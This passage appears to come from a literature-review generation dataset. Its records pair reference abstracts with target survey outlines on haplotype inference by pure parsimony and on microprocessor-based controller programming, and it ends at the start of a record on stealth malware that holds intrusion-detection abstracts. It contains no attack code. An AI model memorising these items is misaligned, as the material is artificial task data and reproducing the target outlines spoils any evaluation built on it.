Both the time needed for a solution, and the accuracy of the solution, depend on the level of recombination in the input strings. The speed of the solution improves with increasing recombination, but the accuracy of the solution decreases with increasing recombination. --- paper_title: Efficient and Tight Upper Bounds for Haplotype Inference by Pure Parsimony using Delayed Haplotype Selection paper_content: Haplotype inference from genotype data is a key step towards a better understanding of the role played by genetic variations on inherited diseases. One of the most promising approaches uses the pure parsimony criterion. This approach is called Haplotype Inference by Pure Parsimony (HIPP) and is NP-hard as it aims at minimising the number of haplotypes required to explain a given set of genotypes. The HIPP problem is often solved using constraint satisfaction techniques, for which the upper bound on the number of required haplotypes is a key issue. Another very well-known approach is Clark's method, which resolves genotypes by greedily selecting an explaining pair of haplotypes. In this work, we combine the basic idea of Clark's method with a more sophisticated method for the selection of explaining haplotypes, in order to explicitly introduce a bias towards parsimonious explanations. This new algorithm can be used either to obtain an approximated solution to the HIPP problem or to obtain an upper bound on the size of the pure parsimony solution. This upper bound can then be used to efficiently encode the problem as a constraint satisfaction problem. The experimental evaluation, conducted using a large set of real and artificially generated examples, shows that the new method is much more effective than Clark's method at obtaining parsimonious solutions, while keeping the advantages of simplicity and speed of Clark's method. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele's sequence. The sequences of other alleles can be inferred by taking the remaining sequence after "subtracting off" the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. --- paper_title: A survey of computational methods for determining haplotypes paper_content: It is widely anticipated that the study of variation in the human genome will provide a means of predicting risk of a variety of complex diseases. Single nucleotide polymorphisms (SNPs) are the most common form of genomic variation. Haplotypes have been suggested as one means for reducing the complexity of studying SNPs. In this paper we review some of the computational approaches that have been taken for determining haplotypes and suggest new approaches. --- paper_title: Boosting Haplotype Inference with Local Search paper_content: A very challenging problem in the genetics domain is to infer haplotypes from genotypes. This process is expected to identify genes affecting health, disease and response to drugs. One of the approaches to haplotype inference aims to minimise the number of different haplotypes used, and is known as haplotype inference by pure parsimony (HIPP). The HIPP problem is computationally difficult, being NP-hard. Recently, a SAT-based method (SHIPs) has been proposed to solve the HIPP problem. This method iteratively considers an increasing number of haplotypes, starting from an initial lower bound. Hence, one important aspect of SHIPs is the lower bounding procedure, which reduces the number of iterations of the basic algorithm, and also indirectly simplifies the resulting SAT model. This paper describes the use of local search to improve existing lower bounding procedures. The new lower bounding procedure is guaranteed to be as tight as the existing procedures. In practice the new procedure is in most cases considerably tighter, allowing significant improvement of performance on challenging problem instances. --- paper_title: Haplotype inference from unphased SNP data in heterozygous polyploids based on SAT paper_content: Background: Haplotype inference based on unphased SNP markers is an important task in population genetics.
Although there are different approaches to the inference of haplotypes in diploid species, the existing software is not suitable for inferring haplotypes from unphased SNP data in polyploid species, such as the cultivated potato (Solanum tuberosum). Potato species are tetraploid and highly heterozygous.ResultsHere we present the software SATlotyper which is able to handle polyploid and polyallelic data. SATlotyper uses the Boolean satisfiability problem to formulate Haplotype Inference by Pure Parsimony. The software excludes existing haplotype inferences, thus allowing for calculation of alternative inferences. As it is not known which of the multiple haplotype inferences are best supported by the given unphased data set, we use a bootstrapping procedure that allows for scoring of alternative inferences. Finally, by means of the bootstrapping scores, it is possible to optimise the phased genotypes belonging to a given haplotype inference. The program is evaluated with simulated and experimental SNP data generated for heterozygous tetraploid populations of potato. We show that, instead of taking the first haplotype inference reported by the program, we can significantly improve the quality of the final result by applying additional methods that include scoring of the alternative haplotype inferences and genotype optimisation. For a sub-population of nineteen individuals, the predicted results computed by SATlotyper were directly compared with results obtained by experimental haplotype inference via sequencing of cloned amplicons. Prediction and experiment gave similar results regarding the inferred haplotypes and phased genotypes.ConclusionOur results suggest that Haplotype Inference by Pure Parsimony can be solved efficiently by the SAT approach, even for data sets of unphased SNP from heterozygous polyploids. SATlotyper is freeware and is distributed as a Java JAR file. The software can be downloaded from the webpage of the GABI Primary Database at http://www.gabipd.org/projects/satlotyper/. The application of SATlotyper will provide haplotype information, which can be used in haplotype association mapping studies of polyploid plants. --- paper_title: Efficient Haplotype Inference with Combined CP and OR Techniques paper_content: Haplotype inference has relevant biological applications, and represents a challenging computational problem. Among others, pure parsimony provides a viable modeling approach for haplotype inference and provides a simple optimization criterion. Alternative approaches have been proposed for haplotype inference by pure parsimony (HIPP), including branch and bound, integer programming and, more recently, propositional satisfiability and pseudo-Boolean optimization (PBO). Among these, the currently best performing HIPP approach is based on PBO. This paper proposes a number of effective improvements to PBO-based HIPP, including the use of lower bounding and pruning techniques effective with other approaches. The new PBO-based HIPP approach reduces by 50% the number of instances that remain unsolvable by HIPP based approaches. --- paper_title: Towards robust CNF encodings of cardinality constraints paper_content: Motivated by the performance improvements made to SAT solvers in recent years, a number of different encodings of constraints into SAT have been proposed. Concrete examples are the different SAT encodings for ≤ 1 (x1, . . . , xn) constraints.
The most widely used encoding is known as the pairwise encoding, which is quadratic in the number of variables in the constraint. Alternative encodings are in general linear, and require using additional auxiliary variables. In most settings, the pairwise encoding performs acceptably well, but can require unacceptably large Boolean formulas. In contrast, linear encodings yield much smaller Boolean formulas, but in practice SAT solvers often perform unpredictably. This lack of predictability is mostly due to the large number of auxiliary variables that need to be added to the resulting Boolean formula. This paper studies one specific encoding for ≤ 1 (x1, . . . , xn) constraints, and shows how a state-of-the-art SAT solver can be adapted to overcome the problem of adding additional auxiliary variables. Moreover, the paper shows that a SAT solver may essentially ignore the existence of auxiliary variables. Experimental results indicate that the modified SAT solver becomes significantly more robust on SAT encodings involving ≤ 1 (x1, . . . , xn) constraints. --- paper_title: Efficient Haplotype Inference with Answer Set Programming paper_content: Identifying maternal and paternal inheritance is essential to be able to find the set of genes responsible for a particular disease. However, due to technological limitations, we have access to genotype data (genetic makeup of an individual), and determining haplotypes (genetic makeup of the parents) experimentally is a costly and time consuming procedure. With these biological motivations, we study a computational problem, called Haplotype Inference by Pure Parsimony (HIPP), that asks for the minimal number of haplotypes that form a given set of genotypes. HIPP has been studied using integer linear programming, branch and bound algorithms, SAT-based algorithms, or pseudo-boolean optimization methods. We introduce a new approach to solving HIPP, using Answer Set Programming (ASP). According to our experiments with a large number of problem instances (some automatically generated and some real), our ASP-based approach solves the most number of problems compared with other approaches. Due to the expressivity of the knowledge representation language of ASP, our approach allows us to solve variations of HIPP, e.g., with additional domain specific information, such as patterns/parts of haplotypes observed for some gene family, or with some missing genotype information. In this sense, the ASP-based approach is more general than the existing approaches to haplotype inference. --- paper_title: Efficient haplotype inference with pseudo-Boolean optimization paper_content: Haplotype inference from genotype data is a key computational problem in bioinformatics, since retrieving directly haplotype information from DNA samples is not feasible using existing technology. One of the methods for solving this problem uses the pure parsimony criterion, an approach known as Haplotype Inference by Pure Parsimony (HIPP). Initial work in this area was based on a number of different Integer Linear Programming (ILP) models and branch and bound algorithms. Recent work has shown that the utilization of a Boolean Satisfiability (SAT) formulation and state of the art SAT solvers represents the most efficient approach for solving the HIPP problem. ::: ::: Motivated by the promising results obtained using SAT techniques, this paper investigates the utilization of modern Pseudo-Boolean Optimization (PBO) algorithms for solving the HIPP problem. 
The paper starts by applying PBO to existing ILP models. The results are promising, and motivate the development of a new PBO model (RPoly) for the HIPP problem, which has a compact representation and eliminates key symmetries. Experimental results indicate that RPoly outperforms the SAT-based approach on most problem instances, being, in general, significantly more efficient. --- paper_title: Efficient haplotype inference with boolean satisfiability paper_content: Mutation in DNA is the principal cause for differences among human beings, and Single Nucleotide Polymorphisms (SNPs) are the most common mutations. Hence, a fundamental task is to complete a map of haplotypes (which identify SNPs) in the human population. Associated with this effort, a key computational problem is the inference of haplotype data from genotype data, since in practice genotype data rather than haplotype data is usually obtained. Different haplotype inference approaches have been proposed, including the utilization of statistical methods and the utilization of the pure parsimony criterion. The problem of haplotype inference by pure parsimony (HIPP) is interesting not only because of its application to haplotype inference, but also because it is a challenging NP-hard problem, being APX-hard. Recent work has shown that a SAT-based approach is the most efficient approach for the problem of haplotype inference by pure parsimony (HIPP), being several orders of magnitude faster than existing integer linear programming and branch and bound solutions. This paper provides a detailed description of SHIPs, a SAT-based approach for the HIPP problem, and presents comprehensive experimental results comparing SHIPs with all other exact approaches for the HIPP problem. These results confirm that SHIPs is currently the most effective approach for the HIPP problem. --- paper_title: Integer programming approaches to haplotype inference by pure parsimony paper_content: In 2003, Gusfield introduced the Haplotype Inference by Pure Parsimony (HIPP) problem and presented an integer program (IP) that quickly solved many simulated instances of the problem [1]. Although it solved well on small instances, Gusfield's IP can be of exponential size in the worst case. Several authors [2], [3] have presented polynomial-sized IPs for the problem. In this paper, we further the work on IP approaches to HIPP. We extend the existing polynomial-sized IPs by introducing several classes of valid cuts for the IP. We also present a new polynomial-sized IP formulation that is a hybrid between two existing IP formulations and inherits many of the strengths of both. Many problems that are too complex for the exponential-sized formulations can still be solved in our new formulation in a reasonable amount of time. We provide a detailed empirical comparison of these IP formulations on both simulated and real genotype sequences. Our formulation can also be extended in a variety of ways to allow errors in the input or model the structure of the population under consideration. --- paper_title: Efficient Haplotype Inference with Combined CP and OR Techniques paper_content: Haplotype inference has relevant biological applications, and represents a challenging computational problem. Among others, pure parsimony provides a viable modeling approach for haplotype inference and provides a simple optimization criterion. 
Alternative approaches have been proposed for haplotype inference by pure parsimony (HIPP), including branch and bound, integer programming and, more recently, propositional satisfiability and pseudo-Boolean optimization (PBO). Among these, the currently best performing HIPP approach is based on PBO. This paper proposes a number of effective improvements to PBO-based HIPP, including the use of lower bounding and pruning techniques effective with other approaches. The new PBO-based HIPP approach reduces by 50% the number of instances that remain unsolvable by HIPP based approaches. --- paper_title: Efficient haplotype inference with pseudo-Boolean optimization paper_content: Haplotype inference from genotype data is a key computational problem in bioinformatics, since retrieving directly haplotype information from DNA samples is not feasible using existing technology. One of the methods for solving this problem uses the pure parsimony criterion, an approach known as Haplotype Inference by Pure Parsimony (HIPP). Initial work in this area was based on a number of different Integer Linear Programming (ILP) models and branch and bound algorithms. Recent work has shown that the utilization of a Boolean Satisfiability (SAT) formulation and state of the art SAT solvers represents the most efficient approach for solving the HIPP problem. ::: ::: Motivated by the promising results obtained using SAT techniques, this paper investigates the utilization of modern Pseudo-Boolean Optimization (PBO) algorithms for solving the HIPP problem. The paper starts by applying PBO to existing ILP models. The results are promising, and motivate the development of a new PBO model (RPoly) for the HIPP problem, which has a compact representation and eliminates key symmetries. Experimental results indicate that RPoly outperforms the SAT-based approach on most problem instances, being, in general, significantly more efficient. --- paper_title: A New Integer Programming Formulation for the Pure Parsimony Problem in Haplotype Analysis paper_content: We present a new integer programming formulation for the haplotype inference by pure parsimony (HIPP) problem. Unlike a previous approach to this problem [2], we create an integer program whose size is polynomial in the size of the input. This IP is substantially smaller for moderate-sized instances of the HIPP problem. We also show several additional constraints, based on the input, that can be added to the IP to aid in finding a solution, and show how to find which of these constraints is active for a given instance in efficient time. We present experimental results that show our IP has comparable success to the formulation of Gusfield [2] on moderate-sized problems, though it is is much slower. However, our formulation can sometimes solve substantially larger problems than are practical with Gusfield’s formulation. --- paper_title: Efficient Haplotype Inference with Combined CP and OR Techniques paper_content: Haplotype inference has relevant biological applications, and represents a challenging computational problem. Among others, pure parsimony provides a viable modeling approach for haplotype inference and provides a simple optimization criterion. Alternative approaches have been proposed for haplotype inference by pure parsimony (HIPP), including branch and bound, integer programming and, more recently, propositional satisfiability and pseudo-Boolean optimization (PBO). Among these, the currently best performing HIPP approach is based on PBO. 
This paper proposes a number of effective improvements to PBO-based HIPP, including the use of lower bounding and pruning techniques effective with other approaches. The new PBO-based HIPP approach reduces by 50% the number of instances that remain unsolvable by HIPP based approaches. --- paper_title: Efficient and Tight Upper Bounds for Haplotype Inference by Pure Parsimony using Delayed Haplotype Selection paper_content: Haplotype inference from genotype data is a key step towards a better understanding of the role played by genetic variations on inherited diseases. One of the most promising approaches uses the pure parsimony criterion. This approach is called Haplotype Inference by Pure Parsimony (HIPP) and is NP-hard as it aims at minimising the number of haplotypes required to explain a given set of genotypes. The HIPP problem is often solved using constraint satisfaction techniques, for which the upper bound on the number of required haplotypes is a key issue. Another very well-known approach is Clark's method, which resolves genotypes by greedily selecting an explaining pair of haplotypes. In this work, we combine the basic idea of Clark's method with a more sophisticated method for the selection of explaining haplotypes, in order to explicitly introduce a bias towards parsimonious explanations. This new algorithm can be used either to obtain an approximated solution to the HIPP problem or to obtain an upper bound on the size of the pure parsimony solution. This upper bound can then be used to efficiently encode the problem as a constraint satisfaction problem. The experimental evaluation, conducted using a large set of real and artificially generated examples, shows that the new method is much more effective than Clark's method at obtaining parsimonious solutions, while keeping the advantages of simplicity and speed of Clark's method. --- paper_title: A New Integer Programming Formulation for the Pure Parsimony Problem in Haplotype Analysis paper_content: We present a new integer programming formulation for the haplotype inference by pure parsimony (HIPP) problem. Unlike a previous approach to this problem [2], we create an integer program whose size is polynomial in the size of the input. This IP is substantially smaller for moderate-sized instances of the HIPP problem. We also show several additional constraints, based on the input, that can be added to the IP to aid in finding a solution, and show how to find which of these constraints is active for a given instance in efficient time. We present experimental results that show our IP has comparable success to the formulation of Gusfield [2] on moderate-sized problems, though it is much slower. However, our formulation can sometimes solve substantially larger problems than are practical with Gusfield’s formulation. --- paper_title: Integer programming approaches to haplotype inference by pure parsimony paper_content: In 2003, Gusfield introduced the Haplotype Inference by Pure Parsimony (HIPP) problem and presented an integer program (IP) that quickly solved many simulated instances of the problem [1]. Although it solved well on small instances, Gusfield's IP can be of exponential size in the worst case. Several authors [2], [3] have presented polynomial-sized IPs for the problem. In this paper, we further the work on IP approaches to HIPP. We extend the existing polynomial-sized IPs by introducing several classes of valid cuts for the IP.
We also present a new polynomial-sized IP formulation that is a hybrid between two existing IP formulations and inherits many of the strengths of both. Many problems that are too complex for the exponential-sized formulations can still be solved in our new formulation in a reasonable amount of time. We provide a detailed empirical comparison of these IP formulations on both simulated and real genotype sequences. Our formulation can also be extended in a variety of ways to allow errors in the input or model the structure of the population under consideration. --- paper_title: Haplotype inference by pure Parsimony paper_content: The next high-priority phase of human genomics will involve the development and use of a full Haplotype Map of the human genome [7]. A critical, perhaps dominating, problem in all such efforts is the inference of large-scale SNP-haplotypes from raw genotype SNP data. This is called the Haplotype Inference (HI) problem. Abstractly, input to the HI problem is a set of n strings over a ternary alphabet. A solution is a set of at most 2n strings over the binary alphabet, so that each input string can be "generated" by some pair of the binary strings in the solution. For greatest biological fidelity, a solution should be consistent with, or evaluated by, properties derived from an appropriate genetic model. ::: ::: A natural model, that has been suggested repeatedly is called here the Pure Parsimony model, where the goal is to find a smallest set of binary strings that can generate the n input strings. The problem of finding such a smallest set is called the Pure Parsimony Problem. Unfortunately, the Pure Parsimony problem is NP-hard, and no paper has previously shown how an optimal Pure-parsimony solution can be computed efficiently for problem instances of the size of current biological interest. In this paper, we show how to formulate the Pure-parsimony problem as an integer linear program; we explain how to improve the practicality of the integer programming formulation; and we present the results of extensive experimentation we have done to show the time and memory practicality of the method, and to compare its accuracy against solutions found by the widely used general haplotyping program PHASE. We also formulate and experiment with variations of the Pure-Parsimony criteria, that allow greater practicality. The results are that the Pure Parsimony problem can be solved efficiently in practice for a wide range of problem instances of current interest in biology. Both the time needed for a solution, and the accuracy of the solution, depend on the level of recombination in the input strings. The speed of the solution improves with increasing recombination, but the accuracy of the solution decreases with increasing recombination. --- paper_title: Efficient Haplotype Inference with Combined CP and OR Techniques paper_content: Haplotype inference has relevant biological applications, and represents a challenging computational problem. Among others, pure parsimony provides a viable modeling approach for haplotype inference and provides a simple optimization criterion. Alternative approaches have been proposed for haplotype inference by pure parsimony (HIPP), including branch and bound, integer programming and, more recently, propositional satisfiability and pseudo-Boolean optimization (PBO). Among these, the currently best performing HIPP approach is based on PBO. 
This paper proposes a number of effective improvements to PBO-based HIPP, including the use of lower bounding and pruning techniques effective with other approaches. The new PBO-based HIPP approach reduces by 50% the number of instances that remain unsolvable by HIPP based approaches. --- paper_title: Inference of haplotypes from PCR-amplified samples of diploid populations. paper_content: Direct sequencing of genomic DNA from diploid individuals leads to ambiguities on sequencing gels whenever there is more than one mismatching site in the sequences of the two orthologous copies of a gene. While these ambiguities cannot be resolved from a single sample without resorting to other experimental methods (such as cloning in the traditional way), population samples may be useful for inferring haplotypes. For each individual in the sample that is homozygous for the amplified sequence, there are no ambiguities in the identification of the allele’s sequence. The sequences of other alleles can be inferred by taking the remaining sequence after “subtracting off’ the sequencing ladder of each known site. Details of the algorithm for extracting allelic sequences from such data are presented here, along with some population-genetic considerations that influence the likelihood for success of the method. The algorithm also applies to the problem of inferring haplotype frequencies of closely linked restriction-site polymorphisms. ---
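The references above repeatedly state the HIPP formulation: genotypes are strings over {0, 1, 2}, haplotypes are binary strings, and a genotype is explained by a haplotype pair that matches it at homozygous sites and differs at heterozygous (value 2) sites, with at most 2n haplotypes needed for n genotypes. The following minimal Python sketch is illustrative only (the function names and the tiny instance are ours, not from any cited paper): it checks the explanation condition and finds a smallest explaining haplotype set by brute force, which is feasible only for toy instances since the problem is NP-hard and APX-hard.

```python
from itertools import combinations, product

def explains(h1, h2, g):
    """True if haplotype pair (h1, h2) resolves genotype g.

    Convention: a genotype site of 0 or 1 means both haplotypes carry that
    value; a site of 2 (heterozygous) means the two haplotypes must differ.
    """
    for a, b, s in zip(h1, h2, g):
        if s == 2:
            if a == b:
                return False
        elif not (a == b == s):
            return False
    return True

def pure_parsimony(genotypes):
    """Smallest haplotype set explaining every genotype, by brute force."""
    m = len(genotypes[0])
    candidates = list(product((0, 1), repeat=m))
    for k in range(1, 2 * len(genotypes) + 1):      # 2n haplotypes always suffice
        for pool in combinations(candidates, k):
            if all(any(explains(h1, h2, g) for h1 in pool for h2 in pool)
                   for g in genotypes):
                return pool
    return None

# Three genotypes over four SNP sites; three haplotypes turn out to suffice.
print(pure_parsimony([(2, 1, 2, 0), (0, 1, 2, 0), (2, 1, 0, 0)]))
```

The exact solvers surveyed above replace this brute-force loop with ILP, SAT, PBO, or ASP encodings of the same explanation condition.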
Title: Haplotype Inference with Boolean Constraint Solving: An Overview Section 1: Introduction Description 1: This section will provide an introduction to the haplotype inference problem, its significance in human genetics, and the computational challenges associated with its solution. It will also introduce the approach using pure parsimony and highlight the paper's objectives. Section 2: Preliminaries Description 2: This section will explain the basic biological concepts and terminologies relevant to haplotype inference, such as DNA, SNPs, and genotypes, ensuring that readers have the necessary background to understand the subsequent sections. Section 3: Haplotype Inference Description 3: This section will delve into the concept of haplotypes, the challenges in directly obtaining them from genotypes, and different computational approaches used to infer haplotypes, including the use of statistical and parsimony-based methods. Section 4: Standard Techniques for Solving HIPP Description 4: This section will discuss general techniques used in preprocessing and solving the HIPP problem, emphasizing methods to simplify problem instances and improve solver performance. Section 5: Simplifying the Problem Instances Description 5: This section will describe approaches to reducing the size of haplotype inference problem instances, such as identifying and removing redundant genotypes and simplifying symmetric sites. Section 6: Computing Lower Bounds Description 6: This section will explore techniques for computing lower bounds on the number of haplotypes required to explain a given set of genotypes, focusing on incompatibility graphs and other heuristic methods. Section 7: Computing Upper Bounds Description 7: This section will explain methods for computing upper bounds using algorithms like Clark's method and Delayed Selection, providing insights into their applications and limitations. Section 8: Solving HIPP with ILP Description 8: This section will review Integer Linear Programming (ILP) models for solving the HIPP problem, detailing different ILP approaches, including exponential-size and polynomial-size models. Section 9: Solving HIPP with SAT Description 9: This section will discuss the use of Boolean Satisfiability (SAT) solvers in addressing the HIPP problem, explaining the construction of CNF formulas and the advantages of SAT-based approaches. Section 10: Solving HIPP with PBO Description 10: This section will cover the use of Pseudo-Boolean Optimization (PBO) for haplotype inference, contrasting it with other methods and highlighting key modifications and performance improvements. Section 11: Practical Experience Description 11: This section will present empirical results and practical evaluations of different models and techniques on a set of challenging problem instances, comparing their efficiency and effectiveness. Section 12: Research Directions Description 12: This section will identify potential future research areas in haplotype inference, discussing the need for improved accuracy and additional criteria for selecting the most appropriate solutions.
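Section 9 of this outline and the cardinality-constraint reference above both hinge on how ≤ 1 (x1, . . . , xn) constraints are encoded into CNF: the pairwise encoding needs no auxiliary variables but is quadratic in the number of clauses, while linear encodings add auxiliary variables. The sketch below is a generic illustration with DIMACS-style integer literals, not code from the cited paper; amo_sequential follows the standard sequential-counter scheme.

```python
def amo_pairwise(xs):
    """Pairwise at-most-one: O(n^2) binary clauses, no auxiliary variables."""
    return [[-a, -b] for i, a in enumerate(xs) for b in xs[i + 1:]]

def amo_sequential(xs, aux_start):
    """Sequential-counter at-most-one: O(n) clauses, n-1 auxiliary variables.

    xs are DIMACS-style positive literals; aux_start is the first unused
    variable index.  s[i] reads 'some x_j with j <= i+1 is already true'.
    Returns (clauses, next_free_variable_index).
    """
    n = len(xs)
    if n <= 1:
        return [], aux_start
    s = list(range(aux_start, aux_start + n - 1))
    clauses = [[-xs[0], s[0]], [-xs[-1], -s[-1]]]
    for i in range(1, n - 1):
        clauses += [[-xs[i], s[i]],          # x_i     -> s_i
                    [-s[i - 1], s[i]],       # s_(i-1) -> s_i
                    [-xs[i], -s[i - 1]]]     # x_i     -> not s_(i-1)
    return clauses, aux_start + n - 1

# At-most-one over four variables 1..4:
print(amo_pairwise([1, 2, 3, 4]))                  # 6 clauses, no new variables
print(amo_sequential([1, 2, 3, 4], aux_start=5))   # 8 clauses, auxiliaries 5, 6, 7
```

For four variables the two encodings are of similar size, but as n grows the pairwise encoding grows quadratically while the sequential one stays linear, at the cost of the auxiliary variables discussed in the cited work.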
A Review Paper on Microprocessor Based Controller Programming
7
--- paper_title: A Quasi-Delay-Insensitive Microprocessor Core Implementation for Microcontrollers paper_content: Microcontrollers are widely used on simple systems; thus, how to keep them operating with high robustness and low power consumption are the two most important issues. It is widely known that asynchronous circuit is the best solution to address these two issues at the same time. However, it’s not very easy to realize asynchronous circuit and certainly very hard to model processors with asynchronous pipeline. That's why most processors are implemented with synchronous circuit. There are several ways to model asynchronous pipeline. The most famous of all is the micropipeline; in addition, most micropipeline based asynchronous systems are implemented with single-rail bundled-delay model. However, we implemented our 8-bit microprocessor core for asynchronous microcontrollers with an alternative – the Muller pipeline. We implemented our microprocessor core with dual-rail quasi-delay-insensitive model with Verilog gate-level design. The instruction set for the target microprocessor core is compatible with PIC18. The correctness was verified with ModelSim software, and the gate-level design was synthesized into Altera Cyclone FPGA. In fact, the model we used in this paper can be applied to implement other simple microprocessor core without much difficulty. --- paper_title: A novel asynchronous pipeline architecture for CISC type embedded controller, A8051 paper_content: Asynchronous design methods are known to have higher performance in power consumption and execution speed than synchronous ones because they just need to activate the required module without feeding clock and power to the entire system. In this paper, we propose an asynchronous processor, A8051, compatible with the Intel 8051, which is a challenge for a pipelined asynchronous design for a CISC type microcontroller. The A8051 has special features such as an optimal instruction execution scheme that eliminates the bubble state, variable instruction length handling and multi-looping pipeline architectures for a CISC machine. The A8051 is composed of 5 pipeline stages based on the CISC architecture. It is implemented with RTL level languages and a verified behavioral model is synthesized with a 0.35 μm CMOS standard cell library. The results show that the A8051 exhibits about 18 times higher speed than that of the Intel 80C51 and about 5 times higher than another asynchronous 8051 design in (H. van Gageldonk et al. Proc. Int. Symp. on Advanced Research in Asynchronous Circuits and Systems, p.96-107, 1998). ---
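Both abstracts rely on handshake-based pipeline control instead of a global clock; the Muller C-element and dual-rail completion detection are the usual textbook building blocks of such Muller pipelines. The toy Python model below is our behavioural illustration of those two primitives under the common (true-rail, false-rail) convention; it is a sketch, not the Verilog gate-level designs described in the papers.

```python
class MullerC:
    """Behavioural model of a two-input Muller C-element.

    The output switches only when both inputs agree; otherwise it holds its
    previous value.  Chained C-elements form the control path of a Muller
    pipeline, where each stage handshakes with its neighbours.
    """
    def __init__(self, init=0):
        self.out = init

    def step(self, a, b):
        if a == b:
            self.out = a
        return self.out

def dual_rail_valid(true_rail, false_rail):
    """Completion detection for one dual-rail bit.

    (0, 0) encodes the empty 'spacer', (1, 0) a valid 1, (0, 1) a valid 0;
    (1, 1) is illegal in a QDI dual-rail code.
    """
    assert not (true_rail and false_rail), "illegal dual-rail codeword"
    return bool(true_rail or false_rail)

c = MullerC()
print(c.step(1, 0))   # inputs disagree -> output holds 0
print(c.step(1, 1))   # both high       -> output rises to 1
print(c.step(0, 1))   # disagree again  -> output holds 1
print(dual_rail_valid(1, 0), dual_rail_valid(0, 0))  # True False
```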
Title: A Review Paper on Microprocessor Based Controller Programming Section 1: INTRODUCTION Description 1: Introduce the historical background, importance, and basic principles of microprocessor-based controllers, emphasizing their evolution and the advantages they offer over earlier systems. Section 2: CONTROLLER CONFIGURATION Description 2: Explain the essential elements and building blocks of microprocessor-based controllers, coupling hardware components with their functional roles. Section 3: CONTROLLER SOFTWARE Description 3: Describe the two main categories of controller software: operating software and application software, detailing their respective functions and significance in the control process. Section 4: Operating software Description 4: Detail the components and functionality of the operating software, including the operating system, task scheduling, I/O scanning, priority interrupts, and other essential tasks. Section 5: Application Software Description 5: Explore different types of application software used for various control requirements, and explain how software can be customized for specific applications such as building management and energy control. Section 6: DIRECT DIGITAL CONTROL SOFTWARE Description 6: Discuss Direct Digital Control (DDC) software, highlighting its role in executing specific control actions, including key elements and various operators used in DDC programs. Section 7: CONTROLLER PROGRAMMING Description 7: Elaborate on the different categories of controller programming, such as configuration programming, system initialization programming, data file programming, and custom control programming, along with necessary procedures and considerations. Section 8: CONCLUSION Description 8: Summarize the importance of software in defining the behavior of microprocessor-based controllers, and discuss key factors influencing programming complexity and effectiveness.
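As a rough illustration of the scan-and-control cycle that Sections 4 and 6 of this outline describe (input scanning, a DDC operator such as PID, and output updating on a fixed scan period), the following Python sketch uses hypothetical read_sensor/write_actuator stand-ins and arbitrary textbook gains; it is not taken from any controller discussed in the review.

```python
import time

def pid_step(error, state, kp=2.0, ki=0.5, kd=0.1, dt=1.0):
    """One evaluation of a textbook PID operator, a typical DDC building block."""
    integral = state["integral"] + error * dt
    derivative = (error - state["prev_error"]) / dt
    state.update(integral=integral, prev_error=error)
    return kp * error + ki * integral + kd * derivative

def scan_cycle(read_sensor, write_actuator, setpoint, cycles=5, dt=1.0):
    """Schematic input-scan / control-calculation / output-update loop."""
    state = {"integral": 0.0, "prev_error": 0.0}
    for _ in range(cycles):
        measurement = read_sensor()                                # input scan
        output = pid_step(setpoint - measurement, state, dt=dt)    # DDC operator
        write_actuator(output)                                     # output update
        time.sleep(dt)                                             # fixed scan period

# Hypothetical I/O stand-ins so the sketch runs on its own.
temp = {"value": 18.0}
scan_cycle(lambda: temp["value"],
           lambda u: temp.update(value=temp["value"] + 0.05 * u),
           setpoint=21.0, cycles=3, dt=0.01)
print(round(temp["value"], 2))
```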
A Survey of Stealth Malware Attacks, Mitigation Measures, and Steps Toward Autonomous Open World Solutions
7
--- paper_title: A data mining framework for building intrusion detection models paper_content: There is often the need to update an installed intrusion detection system (IDS) due to new attack methods or upgraded computing environments. Since many current IDSs are constructed by manual encoding of expert knowledge, changes to IDSs are expensive and slow. We describe a data mining framework for adaptively building Intrusion Detection (ID) models. The central idea is to utilize auditing programs to extract an extensive set of features that describe each network connection or host session, and apply data mining programs to learn rules that accurately capture the behavior of intrusions and normal activities. These rules can then be used for misuse detection and anomaly detection. New detection models are incorporated into an existing IDS through a meta-learning (or co-operative learning) process, which produces a meta detection model that combines evidence from multiple models. We discuss the strengths of our data mining programs, namely, classification, meta-learning, association rules, and frequent episodes. We report on the results of applying these programs to the extensively gathered network audit data for the 1998 DARPA Intrusion Detection Evaluation Program. --- paper_title: Taxonomy and Survey of Collaborative Intrusion Detection paper_content: The dependency of our society on networked computers has become frightening: In the economy, all-digital networks have turned from facilitators to drivers; as cyber-physical systems are coming of age, computer networks are now becoming the central nervous systems of our physical world—even of highly critical infrastructures such as the power grid. At the same time, the 24/7 availability and correct functioning of networked computers has become much more threatened: The number of sophisticated and highly tailored attacks on IT systems has significantly increased. Intrusion Detection Systems (IDSs) are a key component of the corresponding defense measures; they have been extensively studied and utilized in the past. Since conventional IDSs are not scalable to big company networks and beyond, nor to massively parallel attacks, Collaborative IDSs (CIDSs) have emerged. They consist of several monitoring components that collect and exchange data. Depending on the specific CIDS architecture, central or distributed analysis components mine the gathered data to identify attacks. Resulting alerts are correlated among multiple monitors in order to create a holistic view of the network monitored. This article first determines relevant requirements for CIDSs; it then differentiates distinct building blocks as a basis for introducing a CIDS design space and for discussing it with respect to requirements. Based on this design space, attacks that evade CIDSs and attacks on the availability of the CIDSs themselves are discussed. The entire framework of requirements, building blocks, and attacks as introduced is then used for a comprehensive analysis of the state of the art in collaborative intrusion detection, including a detailed survey and comparison of specific CIDS approaches. --- paper_title: Intrusion detection and Big Heterogeneous Data: a Survey paper_content: Intrusion Detection has been heavily studied in both industry and academia, but cybersecurity analysts still desire much more alert accuracy and overall threat analysis in order to secure their systems within cyberspace.
